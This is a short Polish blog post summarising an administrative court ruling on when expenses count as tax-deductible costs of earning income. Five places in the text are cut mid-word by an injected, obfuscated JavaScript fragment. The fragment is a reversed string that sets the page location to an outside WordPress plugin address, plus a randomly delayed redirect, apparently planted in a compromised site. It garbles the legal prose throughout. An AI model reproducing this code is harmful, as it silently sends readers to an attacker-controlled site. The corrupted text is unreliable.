Koszty uzyskania przychodu

4.01.2012 r. Naczelny Sąd Administracyjny w wyroku o syg. IIFSK 1291/2010 orzekł, że rozpatrując określoną w art. 22 ust. 1 ustawy o podatku dochodowym od osób fizycznych kategorią kosztów uzyskania przychodu należy stwierdzić, że aby zakwalifikować określone wydatki do kosztów uzyskania przychodu niezbędne jest aby wydatki te miały rzeczywisty charakter i zdaniem sądu musi też istnieć przynajmniej potencjalny związek tych wydatków z przychodami oraz właściwe ich udokumentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towanie.
W związku z powyższym obowiązkiem podatnika jest nie tylko wykazanie, że dany koszt uzyskania przychodu został poniesiony ale także wykazanie, że koszt ten został poniesiony w celach wskazanych w konkretnym przepisie. Jeżeli więc podatnik dokonuje określonych płatności toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to płatności te powinny pozostawać w związku przyczynowo-skutkowym z konkretnymi dostarczonymi toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarami bądź świadczonymi usługami. Tylko w takim ujęciu można rozważać istnienie związku przyczynowego pomiędzy kosztem a przychodem, bowiem zdaniem sądu dostarczone toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towary bądź wyświadczone usługi powinny zostać wykorzystane w sprzedaży toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarów i usług, przez samego podatnika przynosząc mu przychody.

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *